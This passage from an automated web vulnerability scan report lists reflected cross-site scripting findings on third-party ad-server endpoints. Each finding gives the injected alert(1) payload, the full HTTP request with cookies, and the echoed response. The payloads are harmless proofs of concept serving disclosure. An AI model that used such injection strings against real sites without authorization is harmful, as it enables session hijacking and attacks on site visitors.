Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /PortalServe/?pid=970430S55820100219174939&flash=10&time=5|16:53|-6dca09"%3balert(1)//ea2b3e7c2b5&redir=http://r.turn.com/r/tpclick/id/Dcf-pNQcUXRfWQEAAwABAA/3c/http%3A%2F%2Fads.bluelithium.com%2Fclk%3F2%2C13%253B043d855be1402976%253B12c66594973%2C0%253B%253B%253B920605795%2CWaUDAFA-GABCjmgAAAAAALtAGwAAAAAAAgAQAAIAAAAAAP8AAAAGEeAEHgAAAAAAfYobAAAAAAC6KiQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC9JAIAAAAAAAIAAwAAAAAAc0lZZiwBAAAAAAAAADBiZGE4ZWE4LWY0MzAtMTFkZi04MzdmLTAwMzA0OGQ2ZDRlMAAzmSoAAAA%3D%2Chttp%253A%252F%252Fglobal.ard.yahoo.com%252FSIG%253D15nqs9bgb%252FM%253D715481.14443201.14290363.1442997%252FD%253Dnews%252FS%253D81121452%253ALREC%252FY%253DYAHOO%252FEXP%253D1290214484%252FL%253D.GjhbELEatn9SQS9TNcPQw3ornoX2kznADQABWTl%252FB%253DSX7pAUJe5jA-%252FJ%253D1290207284380677%252FK%253Ddr57bEdaAWb2yHeTVQGMlw%252FA%253D5758430%252FR%253D0%252F%252A%2524%2Chttp%253A%252F%252Fnews.yahoo.com%252Fnews%252Fcommon%252Fpages%252Fgeneric%252Fdarla%252Fmd%253Fen%253Dutf-8%2C/url/$CTURL$&pos=x&dom=http://ad.yieldmanager.com&r=0.8183337452065122 HTTP/1.1
Accept: */*
Referer: http://ad.turn.com/server/ads.htm?&pub=11565610&code=11605355&cch=11605353&l=300x250&nonjs=1&sli=1804925&bli=2370234&exPub=24277&city=Houston&acp=1.3541&rnd=1290207316&3c=http%3A%2F%2Fads%2Ebluelithium%2Ecom%2Fclk%3F2%2C13%253B043d855be1402976%253B12c66594973%2C0%253B%253B%253B920605795%2CWaUDAFA%2DGABCjmgAAAAAALtAGwAAAAAAAgAQAAIAAAAAAP8AAAAGEeAEHgAAAAAAfYobAAAAAAC6KiQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC9JAIAAAAAAAIAAwAAAAAAc0lZZiwBAAAAAAAAADBiZGE4ZWE4LWY0MzAtMTFkZi04MzdmLTAwMzA0OGQ2ZDRlMAAzmSoAAAA%3D%2Chttp%253A%252F%252Fglobal%2Eard%2Eyahoo%2Ecom%252FSIG%253D15nqs9bgb%252FM%253D715481%2E14443201%2E14290363%2E1442997%252FD%253Dnews%252FS%253D81121452%253ALREC%252FY%253DYAHOO%252FEXP%253D1290214484%252FL%253D%2EGjhbELEatn9SQS9TNcPQw3ornoX2kznADQABWTl%252FB%253DSX7pAUJe5jA%2D%252FJ%253D1290207284380677%252FK%253Ddr57bEdaAWb2yHeTVQGMlw%252FA%253D5758430%252FR%253D0%252F%252A%2524%2Chttp%253A%252F%252Fnews%2Eyahoo%2Ecom%252Fnews%252Fcommon%252Fpages%252Fgeneric%252Fdarla%252Fmd%253Fen%253Dutf%2D8%2C&url=http%3A%2F%2Fnews%2Eyahoo%2Ecom%2Fnews%2Fcommon%2Fpages%2Fgeneric%2Fdarla%2Fmd%3Fen%3Dutf%2D8
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: ads.pointroll.com
Proxy-Connection: Keep-Alive
Cookie: PRbu=ElHxOK9GG; PRgo=BBBAAsJqA; PRID=92CD9DBA-F620-4880-9A0A-F6FAE4305B05; PRimp=6F950400-28BF-90A4-0208-BDB000010100; PRca=|AJT3*130:1|AJhI*130:1|AImf*871:1|#; PRcp=|AJT3AACG:1|AJhIAACG:1|AImfAAOD:1|#; PRpl=|E3a5:1|EnBx:1|EG4d:1|#; PRcr=|FjnM:1|FujA:1|F6FH:1|#; PRpc=|E3a5FjnM:1|EnBxFujA:1|EG4dF6FH:1|#; PRvt=CBI42ElW7VLw5wAA6BAe

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 19 Nov 2010 22:56:31 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"

document.write("<iframe id='profr970430' src='http://ads.pointroll.com/PortalServe/?pid=970430S55820100219174939&cid=1403573&pos=h&redir=http://r.turn.com/r/tpclick/id/Dcf-pNQcUXRfWQEAAwABAA/3c/http:/
...[SNIP]...
8430%252FR%253D0%252F%252A%2524,http%253A%252F%252Fnews.yahoo.com%252Fnews%252Fcommon%252Fpages%252Fgeneric%252Fdarla%252Fmd%253Fen%253Dutf-8,/url/$CTURL$&dom=http://ad.yieldmanager.com&time=5|16:53|-6dca09";alert(1)//ea2b3e7c2b5&r=0.8183337452065122&flash=10&server=polRedir' width='300' height='250' frameborder='0' marginwidth='0' marginheight='0' scrolling='NO'>
...[SNIP]...

2.71. http://ads.tw.adsonar.com/adserving/getAds.jsp [pid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.tw.adsonar.com
Path:   /adserving/getAds.jsp

Issue detail

The value of the pid request parameter is copied into the HTML document as plain text between tags. The payload f2113<script>alert(1)</script>2feb4be8354 was submitted in the pid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adserving/getAds.jsp?previousPlacementIds=&placementId=1507068&pid=1778767f2113<script>alert(1)</script>2feb4be8354&ps=-1&zw=445&zh=200&url=http%3A//www.politicsdaily.com/&v=5&dct=Politics%20News%2C%20Elections%20Coverage%2C%20Political%20Analysis%20and%20Opinion&ref=http%3A//www.aolnews.com/search/%3Fquery%3D%2560 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.politicsdaily.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: ads.tw.adsonar.com
Proxy-Connection: Keep-Alive
Cookie: TID=16e8oqe01cg8de; TData=99999%7C50085%7C54057%7C60490%7C50212%7C50220%7C60183%7C50216%7C50229

Response

HTTP/1.1 200 OK
Date: Fri, 19 Nov 2010 23:43:28 GMT
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: policyref="http://ads.adsonar.com/w3c/p3p.xml", CP="NOI DSP LAW NID CURa ADMa DEVa TAIo PSAo PSDo OUR SAMa OTRa IND UNI PUR COM NAV INT DEM STA PRE LOC"
Content-Type: text/html;charset=utf-8
Vary: Accept-Encoding,User-Agent
Content-Length: 2512


           <!DOCTYPE html PUBLIC "-//W3C//DTD html 4.01 transitional//EN">
           <html>
               <head>
                   <title>Ads by Quigo</title>
                   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
...[SNIP]...
</script>
                   
                   
                                           java.lang.NumberFormatException: For input string: "1778767f2113<script>alert(1)</script>2feb4be8354"

   
                                                           </head>
...[SNIP]...

2.72. http://ads.tw.adsonar.com/adserving/getAds.jsp [placementId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.tw.adsonar.com
Path:   /adserving/getAds.jsp

Issue detail

The value of the placementId request parameter is copied into an HTML comment. The payload 2b1df--><script>alert(1)</script>a59020951c9 was submitted in the placementId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /adserving/getAds.jsp?previousPlacementIds=&placementId=15056882b1df--><script>alert(1)</script>a59020951c9&pid=994775&ps=-1&zw=640&zh=185&url=http%3A//www.aolnews.com/&v=5&dct=Top%20News%20%26%20Analysis%2C%20US%2C%20World%2C%20Sports%2C%20Celebrity%20%26%20Weird%20News HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.aolnews.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: ads.tw.adsonar.com
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: TID=16e8oqe01cg8de; TData=99999%7C50085%7C54057%7C60490%7C50212%7C50220%7C60183

Response

HTTP/1.1 200 OK
Date: Fri, 19 Nov 2010 23:42:42 GMT
Vary: Accept-Encoding,User-Agent
Content-Type: text/plain
Content-Length: 3236


   <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
   <html>
       <body>
       <!-- java.lang.NumberFormatException: For input string: "15056882b1df--><script>alert(1)</script>a59020951c9" -->
...[SNIP]...

2.73. http://ads.tw.adsonar.com/adserving/getAds.jsp [ps parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.tw.adsonar.com
Path:   /adserving/getAds.jsp

Issue detail

The value of the ps request parameter is copied into an HTML comment. The payload 6ec50--><script>alert(1)</script>d05b86eb3d6 was submitted in the ps parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /adserving/getAds.jsp?previousPlacementIds=&placementId=1507068&pid=1778767&ps=-16ec50--><script>alert(1)</script>d05b86eb3d6&zw=445&zh=200&url=http%3A//www.politicsdaily.com/&v=5&dct=Politics%20News%2C%20Elections%20Coverage%2C%20Political%20Analysis%20and%20Opinion&ref=http%3A//www.aolnews.com/search/%3Fquery%3D%2560 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.politicsdaily.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: ads.tw.adsonar.com
Proxy-Connection: Keep-Alive
Cookie: TID=16e8oqe01cg8de; TData=99999%7C50085%7C54057%7C60490%7C50212%7C50220%7C60183%7C50216%7C50229

Response

HTTP/1.1 200 OK
Date: Fri, 19 Nov 2010 23:43:32 GMT
Vary: Accept-Encoding,User-Agent
Content-Type: text/plain
Content-Length: 3724


   <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
   <html>
       <body>
       <!-- java.lang.NumberFormatException: For input string: "-16ec50--><script>alert(1)</script>d05b86eb3d6" -->
   
...[SNIP]...

2.74. http://adserver.adtechus.com/addyn%7C3.0%7C5235%7C1288708%7C0%7C16%7CADTECH [AdId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /addyn%7C3.0%7C5235%7C1288708%7C0%7C16%7CADTECH

Issue detail

The value of the AdId request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 117f6'-alert(1)-'11281d989c was submitted in the AdId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /addyn%7C3.0%7C5235%7C1288708%7C0%7C16%7CADTECH;AdId=913421;BnId=-1;;loc=100;target=_blank;misc=[TIMESTAMP];rdclick=117f6'-alert(1)-'11281d989c HTTP/1.1
Accept: */*
Referer: http://www.drudgereport.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: adserver.adtechus.com
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: CfP=1; JEB2=4CE6E57B6E651A454F57E65AF000985E; 1=AE775A24.133AFE.1.114457.4D.0.4CE91B1C.D5E75.8E869E.145E.1

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 277

document.write('<a href="117f6'-alert(1)-'11281d989chttp://adserver.adtechus.com/?adlink|5235|1288708|0|16|AdId=-8;BnId=-1;itime=0;" target=_blank><img src="http://aka-cdn-ns.adtechus.com/images/Defau
...[SNIP]...

2.75. http://adserver.adtechus.com/addyn%7C3.0%7C5235%7C1288708%7C0%7C16%7CADTECH [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /addyn%7C3.0%7C5235%7C1288708%7C0%7C16%7CADTECH

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bd34e'-alert(1)-'24f72934008 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /addyn%7C3.0%7C5235%7C1288708%7C0%7C16%7CADTECH;AdId=913421;BnId=-1;;loc=100;target=_blank;misc=[TIMESTAMP];rdclick=&bd34e'-alert(1)-'24f72934008=1 HTTP/1.1
Accept: */*
Referer: http://www.drudgereport.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: adserver.adtechus.com
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: CfP=1; JEB2=4CE6E57B6E651A454F57E65AF000985E; 1=AE775A24.133AFE.1.114457.4D.0.4CE91B1C.D5E75.8E869E.145E.1

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 281

document.write('<a href="&bd34e'-alert(1)-'24f72934008=1http://adserver.adtechus.com/?adlink|5235|1288708|0|16|AdId=-8;BnId=-1;itime=0;" target=_blank><img src="http://aka-cdn-ns.adtechus.com/images/D
...[SNIP]...

2.76. http://adserver.adtechus.com/addyn/3.0/5214.1/1044213/0/-1/ADTECH [loc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /addyn/3.0/5214.1/1044213/0/-1/ADTECH

Issue detail

The value of the loc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ce688"-alert(1)-"cec543173c6 was submitted in the loc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /addyn/3.0/5214.1/1044213/0/-1/ADTECH;loc=100;target=_blank;alias=toronto.com_homepage_300x250_2;size=300x250;key=;grp=353;misc=1290373580669;aduho=-360;rdclick=ce688"-alert(1)-"cec543173c6 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://www.toronto.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4CD721666E651A444F57E65AF001514E; 1=AE7702EE.133AEA.4.11546B.1.0.4CE702EE.133AE8.8C3D07.145E.1

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 1973

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...
<a href=\"http://adserver.adtechus.com/adlink/5214/1044213/0/170/AdId=1114797;BnId=1;itime=384544517;nodecode=yes;link=ce688"-alert(1)-"cec543173c6http://www.seetorontonow.com/camp/couples/index.html?ucid=M2010-001705\" target=\"_blank\">
...[SNIP]...

2.77. http://adserver.adtechus.com/addyn/3.0/5214.1/1044213/0/-1/ADTECH [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /addyn/3.0/5214.1/1044213/0/-1/ADTECH

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4b16b"-alert(1)-"ee8cf03855d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /addyn/3.0/5214.1/1044213/0/-1/ADTECH;loc=100;target=_blank;alias=toronto.com_homepage_300x250_2;size=300x250;key=;grp=353;misc=1290373580669;aduho=-360;rdclick=&4b16b"-alert(1)-"ee8cf03855d=1 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://www.toronto.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4CD721666E651A444F57E65AF001514E; 1=AE7702EE.133AEA.4.11546B.1.0.4CE702EE.133AE8.8C3D07.145E.1

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 2247

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...
<a href=\"http://adserver.adtechus.com/adlink/5214/1044213/0/170/AdId=1114797;BnId=1;itime=384546624;nodecode=yes;link=&4b16b"-alert(1)-"ee8cf03855d=1http://www.seetorontonow.com/camp/couples/index.html?ucid=M2010-001705\" target=\"_blank\">
...[SNIP]...

2.78. http://adserver.adtechus.com/addyn/3.0/5214.1/1076814/0/-1/ADTECH [loc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /addyn/3.0/5214.1/1076814/0/-1/ADTECH

Issue detail

The value of the loc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 71102"-alert(1)-"cd09ef82e73 was submitted in the loc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /addyn/3.0/5214.1/1076814/0/-1/ADTECH;loc=100;target=_blank;alias=toronto.com_homepage_135x68_1;size=135x68;key=;grp=353;misc=1290373581486;aduho=-360;rdclick=71102"-alert(1)-"cd09ef82e73 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://www.toronto.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4CD721666E651A444F57E65AF001514E; 1=AE7702EE.133AEA.4.11546B.1.0.4CE702EE.133AE8.8C3D07.145E.1

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 2418

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...
<a href=\"http://adserver.adtechus.com/adlink/5214/1076814/0/2687/AdId=1146641;BnId=1;itime=384553960;nodecode=yes;link=71102"-alert(1)-"cd09ef82e73http://www.foodandwineexpo.ca/sitepages/?cid=356&cn=BUY%20ADMISSION%20TICKETS&an=ADMISSION%20TICKETS\" title=\"\" target=\"_blank\">
...[SNIP]...

2.79. http://adserver.adtechus.com/addyn/3.0/5214.1/1076814/0/-1/ADTECH [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /addyn/3.0/5214.1/1076814/0/-1/ADTECH

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 17501"-alert(1)-"5e358f87f7b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /addyn/3.0/5214.1/1076814/0/-1/ADTECH;loc=100;target=_blank;alias=toronto.com_homepage_135x68_1;size=135x68;key=;grp=353;misc=1290373581486;aduho=-360;rdclick=&17501"-alert(1)-"5e358f87f7b=1 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://www.toronto.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4CD721666E651A444F57E65AF001514E; 1=AE7702EE.133AEA.4.11546B.1.0.4CE702EE.133AE8.8C3D07.145E.1

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 2424

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...
<a href=\"http://adserver.adtechus.com/adlink/5214/1076814/0/2687/AdId=1146641;BnId=1;itime=384555255;nodecode=yes;link=&17501"-alert(1)-"5e358f87f7b=1http://www.foodandwineexpo.ca/sitepages/?cid=356&cn=BUY%20ADMISSION%20TICKETS&an=ADMISSION%20TICKETS\" title=\"\" target=\"_blank\">
...[SNIP]...

2.80. http://adserver.adtechus.com/addyn/3.0/5214.1/1076815/0/-1/ADTECH [loc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /addyn/3.0/5214.1/1076815/0/-1/ADTECH

Issue detail

The value of the loc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 28f4d"-alert(1)-"6cad9f6bb68 was submitted in the loc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /addyn/3.0/5214.1/1076815/0/-1/ADTECH;loc=100;target=_blank;alias=toronto.com_homepage_135x68_2;size=135x68;key=;grp=353;misc=1290373581632;aduho=-360;rdclick=28f4d"-alert(1)-"6cad9f6bb68 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://www.toronto.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4CD721666E651A444F57E65AF001514E; 1=AE7702EE.133AEA.4.11546B.1.0.4CE702EE.133AE8.8C3D07.145E.1

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 2289

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...
<a href=\"http://adserver.adtechus.com/adlink/5214/1076815/0/2687/AdId=1284103;BnId=1;itime=384557603;nodecode=yes;link=28f4d"-alert(1)-"6cad9f6bb68www.torontochristmasmarket.com\" title=\"\" target=\"_blank\">
...[SNIP]...

2.81. http://adserver.adtechus.com/addyn/3.0/5214.1/1076815/0/-1/ADTECH [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /addyn/3.0/5214.1/1076815/0/-1/ADTECH

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e8f26"-alert(1)-"b5d5d4e6f0f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /addyn/3.0/5214.1/1076815/0/-1/ADTECH;loc=100;target=_blank;alias=toronto.com_homepage_135x68_2;size=135x68;key=;grp=353;misc=1290373581632;aduho=-360;rdclick=&e8f26"-alert(1)-"b5d5d4e6f0f=1 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://www.toronto.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4CD721666E651A444F57E65AF001514E; 1=AE7702EE.133AEA.4.11546B.1.0.4CE702EE.133AE8.8C3D07.145E.1

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 2295

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...
<a href=\"http://adserver.adtechus.com/adlink/5214/1076815/0/2687/AdId=1284103;BnId=1;itime=384558622;nodecode=yes;link=&e8f26"-alert(1)-"b5d5d4e6f0f=1www.torontochristmasmarket.com\" title=\"\" target=\"_blank\">
...[SNIP]...

2.82. http://adserver.adtechus.com/addyn/3.0/5214.1/1076816/0/-1/ADTECH [loc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /addyn/3.0/5214.1/1076816/0/-1/ADTECH

Issue detail

The value of the loc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3f4cc"-alert(1)-"e7c994764d3 was submitted in the loc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /addyn/3.0/5214.1/1076816/0/-1/ADTECH;loc=100;target=_blank;alias=toronto.com_homepage_135x68_3;size=135x68;key=;grp=353;misc=1290373581762;aduho=-360;rdclick=3f4cc"-alert(1)-"e7c994764d3 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://www.toronto.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4CD721666E651A444F57E65AF001514E; 1=AE7702EE.133AEA.4.11546B.1.0.4CE702EE.133AE8.8C3D07.145E.1

Response

HTTP/1.0 200 OK
Connection: close
